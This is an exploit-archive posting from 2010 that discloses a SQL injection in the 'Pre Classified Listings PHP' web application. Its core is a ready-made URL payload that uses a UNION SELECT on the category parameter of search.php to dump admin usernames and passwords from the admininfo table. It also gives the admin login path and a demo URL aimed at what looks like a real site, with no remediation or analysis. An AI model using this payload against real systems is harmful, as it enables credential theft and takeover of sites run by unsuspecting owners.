[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Pre Classified Listings PHP SQL Injection Vulnerability
# Published : 2010-11-14
# Author : Cru3l.b0y
# Previous Title : AWCM v2.1 final Remote File Inclusion Vulnerability
# Next Title : Pre Real Estate Listings Authentication Bypass Vulnerability


In The Name Of GOD
[+] Exploit Title: Pre Classified Listings PHP SQL Injection Vulnerability
[+] Date: 2010-11-14
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.preproject.com/pclphp.asp
[+] Price : 48.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit : 

             http://target/path/search.php?category=-1+union+select+group_concat(username,0x3a,password)+from+admininfo

[+] Admin Page: /admin/index.php

[+] Demo: http://www.site.com/classi/search.php?category=-1+union+select+group_concat(username,0x3a,password)+from+admininfo